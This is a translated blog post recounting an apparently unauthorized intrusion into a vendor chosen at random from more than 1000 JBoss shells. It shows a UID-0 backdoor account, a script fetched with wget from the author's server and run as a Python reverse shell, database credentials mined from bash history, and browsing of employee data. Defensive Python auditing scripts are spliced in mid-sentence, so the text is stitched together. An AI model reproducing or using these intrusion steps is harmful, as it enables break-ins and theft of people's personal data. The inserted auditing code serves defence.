Yesterday I integrated the Jexboss script into my multithreaded framework, swept JBoss instances across the country, and found more than 1000 shells.
Tool address: Https://github.com/Xyntax/POC-T
I picked a seemingly large vendor at random for this penetration test.
Finding an entry point
I got a shell through Jexboss and saw a CentOS machine (IP redacted).
It looked like root; let's check.
The unstable foothold shell
After running a few commands I found that Jexboss's own shell was very unstable, with various issues, including but not limited to these two serious ones:
- When an interactive command is executed, the program crashes and exits. For example, cat echoes its output normally, but vi makes the shell exit directly with an error.
- There is no output when a command fails.
I'd have to get a stable shell.
Trying nc
I saw that the system had nc and wanted to simply bounce a stable shell back with it, but none of the nc commands I submitted returned any output, and I couldn't get a shell at all.
Trying Python
Having given up on nc, I checked whether the system had python: --version produced no output, but -h did.
Then I tried to send a shell back with Python using this code, but it didn't work, which was a bit odd.
I also ran a simple print, and there was still no output!
Why?
Here I thought it over: if errors produce no output, then the failure was probably caused by the ( ) ' " and other special characters in the code being mangled in transit.
I tested this with a few simple shell commands and confirmed the guess:
- '
- "
- |
- >
- >>
- &
Commands containing these special characters cannot be executed, and nothing is echoed back.
What does that mean?
It means that I basically cannot run any command containing non-alphabetic characters through this shell!
No nc, no Python, no pipes, no redirects.
Trying SSH
The shell seemed basically useless. I looked at the processes, ports and iptables firewall and found some specific configuration, which showed that some security defenses had been deployed. Then I saw port 22: if I turned off the firewall and created a new user, couldn't I connect from outside with SSH?
So I created a new admin user:
useradd -o -u 0 -g 0 -M -d /root -s /bin/bash php
Checked /etc/passwd:
No problem, created successfully!
Then, when changing its password:
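The useradd line above creates a second account with UID 0, which the kernel treats as root regardless of the login name. As an added example (not code from the post), the following script audits passwd(5) text for exactly that: UID-0 entries other than root, and non-root accounts that share root's home directory. The sample passwd content is constructed for the example.

```python
"""Detect root-equivalent accounts in /etc/passwd (added example, not from the post).

A passwd entry whose UID is 0 but whose name is not 'root' is root under
another name. The -d /root option used in the post additionally leaves a
non-root account pointing at root's home directory. Both are reported here.
"""
from dataclasses import dataclass
from typing import List


@dataclass(frozen=True)
class PasswdEntry:
    name: str
    uid: int
    gid: int
    home: str
    shell: str


def parse_passwd(text: str) -> List[PasswdEntry]:
    """Parse passwd(5) lines of the form name:passwd:uid:gid:gecos:home:shell."""
    entries: List[PasswdEntry] = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError(f"line {lineno}: expected 7 colon-separated fields")
        name, _pw, uid, gid, _gecos, home, shell = fields
        entries.append(PasswdEntry(name, int(uid), int(gid), home, shell))
    return entries


def find_uid0_aliases(text: str) -> List[str]:
    """Login names with UID 0 other than 'root'."""
    return [e.name for e in parse_passwd(text) if e.uid == 0 and e.name != "root"]


def find_shared_root_home(text: str) -> List[str]:
    """Non-root accounts whose home directory is /root."""
    return [e.name for e in parse_passwd(text) if e.name != "root" and e.home == "/root"]


# Constructed sample: a normal CentOS-style passwd plus the alias the post creates.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
jboss:x:500:500::/home/jboss:/bin/bash
php:x:0:0::/root:/bin/bash
"""

if __name__ == "__main__":
    for name in find_uid0_aliases(SAMPLE_PASSWD):
        print(f"UID 0 alias: {name}")
    for name in find_shared_root_home(SAMPLE_PASSWD):
        print(f"shares /root: {name}")
```

Run it against a real host with `parse_passwd(open("/etc/passwd").read())`; any name returned by find_uid0_aliases deserves an immediate look, since legitimate systems almost never carry a second UID-0 login.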
passwd php
No output!!!
I remembered that changing a password requires several rounds of user interaction, and as noted earlier, interactive commands error out and exit with no output. So that was over.
SSH generally doesn't allow connections with an empty password; I tried, and the result was this:
ssh: connect to host 183.xxx.xxx.xxx port 22: Connection refused
I looked at the SSH configuration file with cat /etc/ssh/sshd_config. The result was as follows:
# $OpenBSD: sshd_config,v 1.97 2015/08/06 14:53:21 deraadt Exp $
# This is the sshd server system-wide configuration file. See
# sshd_config(5) for more information.
# This sshd was compiled with PATH=/usr/bin:/bin:/usr/sbin:/sbin
# The strategy used for options in the default sshd_config shipped with
# OpenSSH is to specify options with their default value where
# possible, but leave them commented. Uncommented options override the
# default value.
Port 2525
#AddressFamily any
#ListenAddress 0.0.0.0
#ListenAddress ::
Besides the configuration file forbidding empty-password login, the administrator had also changed the default SSH port to 2525, as you can see.
So if I added a line to the configuration file allowing empty-password login, wouldn't that work?
But I can't use non-alphabetic characters when writing a command, and I can't use an interactive editor!
vi crashes outright, sed doesn't work, echo with redirection doesn't work either...
A stable foothold
Judging by the flavor of this lousy shell, writing anything to the system was going to be very hard, but downloading code from outside and running it locally should always work; after all, there is Python.
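Two details of sshd_config matter for anyone reviewing the tampering contemplated above: sshd uses the first uncommented value of each directive, so a line appended at the end only takes effect if the directive was not already set earlier, and directives after a Match block apply only conditionally. As an added example (not code from the post), this auditor parses the global section with those rules and reports authentication-weakening settings. BASELINE_CONFIG reproduces the Port 2525 excerpt from the post; the tampered and pinned variants are constructed.

```python
"""Audit sshd_config for settings that loosen authentication (added example, not from the post)."""
import re
from typing import Dict, List

# "Key value" or "Key=value"; sshd accepts both spellings.
DIRECTIVE = re.compile(r"^(\S+?)(?:\s+|\s*=\s*)(.*)$")


def effective_directives(config_text: str) -> Dict[str, str]:
    """Global directives with first-occurrence-wins semantics, keys lowercased.

    Parsing stops at the first Match block because everything inside it is
    conditional on the connecting user or address.
    """
    directives: Dict[str, str] = {}
    for raw in config_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = DIRECTIVE.match(line)
        if not m:
            continue
        key, value = m.group(1).lower(), m.group(2).strip()
        if key == "match":
            break
        directives.setdefault(key, value)  # later duplicates are ignored by sshd
    return directives


def audit_sshd_config(config_text: str) -> List[str]:
    """Return human-readable findings; defaults are OpenSSH's when a directive is absent."""
    d = effective_directives(config_text)
    findings: List[str] = []
    if d.get("permitemptypasswords", "no").lower() == "yes":
        findings.append("PermitEmptyPasswords yes: accounts with empty passwords can log in")
    if d.get("permitrootlogin", "prohibit-password").lower() == "yes":
        findings.append("PermitRootLogin yes: root can log in with a password")
    if d.get("passwordauthentication", "yes").lower() != "no":
        findings.append("PasswordAuthentication enabled: password guessing remains possible")
    return findings


# Excerpt matching the post (non-default port, nothing else set).
BASELINE_CONFIG = """\
# $OpenBSD: sshd_config,v 1.97 2015/08/06 14:53:21 deraadt Exp $
Port 2525
#AddressFamily any
#ListenAddress 0.0.0.0
#ListenAddress ::
"""

# Constructed: an appended line; nothing set the directive earlier, so it wins.
TAMPERED_CONFIG = BASELINE_CONFIG + "PermitEmptyPasswords yes\n"

# Constructed: the directive is pinned explicitly first, so the appended line is ignored.
PINNED_CONFIG = (
    BASELINE_CONFIG
    + "PermitEmptyPasswords no\n"
    + "PasswordAuthentication no\n"
    + "PermitEmptyPasswords yes\n"
)

if __name__ == "__main__":
    for label, cfg in [("baseline", BASELINE_CONFIG), ("tampered", TAMPERED_CONFIG), ("pinned", PINNED_CONFIG)]:
        print(label, effective_directives(cfg).get("port"), audit_sshd_config(cfg) or "clean")
```

The pinned variant is the practical takeaway: stating PermitEmptyPasswords, PasswordAuthentication and PermitRootLogin explicitly near the top of the file means a line appended later cannot change the effective value, and a diff of the file against a known-good copy still shows the attempt.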
wget xxx.xxx.xxx
This command has no special characters! It should execute.
I wrote a script, put it on my server, and then wget'd it from the target machine.
When it showed up in ls, I was thrilled!
python shell.py
Decisively: when sh-4.1 appeared, I knew it was done!
Then I changed the password of the user I had created, connected with SSH from outside, and the foothold was finally stable.
Browsing the database
With a stable shell, let's look at the database.
Try to find relevant commands in the command history:
cat ~/.bash_history | grep sql
The results were as follows, and sure enough:
Effortlessly into the database.
The MySQL command line has long been a strong suit of mine.
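The history search works because MySQL clients are routinely run with the password on the command line, where shell history, process listings and audit logs record it. As an added example (not code from the post), this scanner finds such lines in history text, redacts the secret, and returns what needs rotating; it also covers curl basic-auth credentials, which end up in history the same way. The history lines are constructed for the example.

```python
"""Find credentials left in shell history (added example, not from the post)."""
import re
from typing import List, NamedTuple


class Finding(NamedTuple):
    lineno: int
    tool: str
    redacted: str


# Group 1 of each pattern is the secret to redact.
PATTERNS = [
    # mysql clients: -pSECRET (no space; "-p dbname" prompts instead) or --password=SECRET
    ("mysql", re.compile(r"\b(?:mysql|mysqldump|mysqladmin)\b.*?(?<!\S)(?:-p|--password=)(\S+)")),
    # curl basic auth given inline: -u user:pass or --user=user:pass
    ("curl", re.compile(r"\bcurl\b.*?(?<!\S)(?:-u |--user[ =])(\S+)")),
]


def scan_history(lines: List[str]) -> List[Finding]:
    """Return one finding per history line that carries an inline credential."""
    findings: List[Finding] = []
    for lineno, line in enumerate(lines, 1):
        for tool, pattern in PATTERNS:
            m = pattern.search(line)
            if m:
                redacted = line[: m.start(1)] + "***" + line[m.end(1):]
                findings.append(Finding(lineno, tool, redacted))
                break
    return findings


# Constructed sample history; "cloudcompany" echoes the schema name from the post.
SAMPLE_HISTORY = [
    "cd /opt/jboss",
    "mysql -uroot -pS3cretPass cloudcompany",
    "mysqldump --user=root --password=S3cretPass cloudcompany > backup.sql",
    "mysql -u root -p",
    "curl -u admin:hunter2 http://127.0.0.1:8080/status",
    "ls -la",
]

if __name__ == "__main__":
    for f in scan_history(SAMPLE_HISTORY):
        print(f"line {f.lineno} [{f.tool}]: {f.redacted}")
```

Line 4 is deliberately not flagged: a bare `-p` makes the client prompt, which is the form to encourage, along with option files such as ~/.my.cnf with restrictive permissions instead of passwords on the command line.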
use information_schema;
select table_name, table_rows from tables where TABLE_SCHEMA = 'cloudcompany' order by table_rows desc;
Administrator table:
Employee data (216 rows), take a look:
Picked something useful to look at:
Another table (300,000 rows):
Conclusion
It seems the database doesn't hold much. Writing the article while working was too inefficient; I had already spent almost four hours, so I skipped the intranet, wrapped up the vulnerability and left!
Note: All sensitive data in this article has been masked. It is for technical exchange only, and the intrusion has been submitted to the cloud vulnerability platform.
Please credit the source when reposting and let me know.
Mail: [Email protected]
Notes on a tortuous penetration test